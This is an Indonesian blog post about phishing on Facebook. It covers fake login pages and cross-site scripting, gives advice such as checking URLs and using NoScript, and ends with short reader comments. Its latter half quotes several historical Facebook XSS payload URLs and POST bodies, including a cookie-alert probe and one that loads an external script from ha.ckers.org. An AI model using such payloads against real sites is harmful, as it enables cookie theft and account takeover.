maksud dari pertanyaan diatas adalah bukannya situs facebook.com yang di hack melainkan hacking pada account-account di facebook dengan metode yang disebut “Phishing”.
apakah itu phishing??
dalam computer security, phishing didefinisikan sebagai suatu proses untuk mendapatkan informasi private seperti username, password dan kartu kredit dengan menggunakan dan memalsukan entitas terpercaya, bisa berupa memalsukan halaman dan link yang nyaris mirip dengan aslinya. (wikipedia)
phising ini biasanya dapat berupa email, instant messaging yang berisi link ke entitas terkait dengan .
benarkah phishing dapat dilakukan di facebook?? bagaimana menanggulanginya??
metoda phising dapat diterapkan di facebook dengan menggunakan metode fake login (1) dan dengan menggunakan Cross Site Scripting (XSS).
(1) seperti hal yang sudah diketahui, fake login artinya kita di kirim ke halaman login palsu dan diminta untuk login ulang. masalah ini mudah sekali ditangani dengan ketelitian anda setiap kali anda diminta untuk login. selalu perhatikan hal-hal dibawah ini :
- pastikan url (link) pada browser anda benar-benar http://www.facebook.com
- pastikan anda benar-benar sudah logout atau belum dengan masuk ke home dari facebook dengan mengetikan alamat http://www.facebook.com/home.php atau http://www.facebook.com
kita akan bahas masalah lebih lanjut pada masalah yang lebih serius yaitu (2) XSS atau Cross site scripting.
XSS adalah suatu kerentanan security computer pada aplikasi web yang memperbolehkan kita memasukan post / input berupa code injection pada sebuah halaman web yang kemudian halaman tersebut dapat dilihat oleh user lain. code yang biasanya di gunakan adalah client side code (html atau javascript)
pada XSS ini dapat digunakan oleh attacker untuk mencuri data sensitif seperti cookie (4) pada browser, id / username dan password, hingga melakukan bypass terhadap access control (5) seperti halnya same-origin-policy (6)
ket :
(4)cookies : suatu string kecil berisi text (bisa berupa id, password, username, dll) untuk validasi / verifikasi “who am i” untuk access pada sebuah website dan text tersebut tersimpan pada browser kita.
(5)access control : hak akses untuk mengontrol dari sebuah website (administrator, registered user dsb)
(6)same-origin-policy : hak untuk seseorang yang sebenarnya tidak berhak menjadi sama seperti hak pada orang yang seharusnya (original).
yang lebih bahaya dari XSS ini adalah user sering kali tidak sadar bahwa sudah terkena XSS, karena XSS berbeda dengan fake login. XSS tidak memiliki indikasi seperti fake url dan fake page, kita hanya melihat halaman pada facebook tidak memiliki keanehan dan kejanggalan walaupun terdapat XSS dan malicious code lain di dalamnya. salah satu cara yang dapat dilakukan adalah dengan menggunakan tools lain untuk memeriksa client-side code pada suatu website. salah satu tools yang dapat digunakan (firefox user only) adalah dengan menginstall plugins noScript pada Browser Firefox anda.
untuk menginstall noScript klik here
noScript akan memberikan notification berupa warning akan adanya XSS pada halaman web yang sedang anda kunjungi dan noScript juga dapat disetting opsi untuk selalu memblok javascript yang berbahaya (malicious code).
note : facebook team kerap melakukan update pada facebook.com berhubungan dengan kasus XSS ini.
Bagaimanakah attacker penyisipan malicious code (XSS) ke dalam Facebook??
banyak cara yang dapat dilakukan untuk menyisipkan XSS pada facebook, beberapa cara di antaranya sudah Fixed atau sudah di benahi oleh facebook team.
- menyisipkan code XSS pada profile (wall, status, dll) : sudah di benahi sejak 2007-2008
- mensubmit applikasi web (seperti games, dsb) pada apps.facebook.com yang memiliki XSS.
cara kedua ini yang hingga sekarang masih banyak digunakan, karena kita bisa mensubmit aplikasi pada facebook dan menyisipkan XSS kedalamnya. hingga sekarang facebook team menyortir aplikasi yang terindikasi memiliki XSS.
contoh beberapa XSS berbahaya yang pernah terdapat di Facebook yang mengirimkan cookie kita pada web lain sehingga attacker memiliki access control seperti kita dengan menggunakan cookie yang sama:
http://www.facebook.com/jobs/position.php?st=
%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E
%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.facebook.com/jobs/position.php?st=
%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
Contoh beberapa XSS pada Facebook yang telah ditangani oleh Facebook Team:
XSS #1 with POST
http://www.new.facebook.com/r.php
POST: reg_email__=”onmouseover=”alert(’XSS – ZJ’)”foo=”bar
XSS #2 with POST
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
POST:
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
XSS #3
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.
XSS #4 with POST
http://developers.facebook.com/tools.php?fbml
POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
sumber : http://www.xssed.com/news/80/New_highly_critical_Facebook_XSS_vulnerabilities_pose_serious_privacy_risks/
sumber : wikipedia, xssed.com, facebook, blog.blogsecurify.com
busseeet ni.. dah ganti aja ni blog..
nice posting..
gw kejar ah...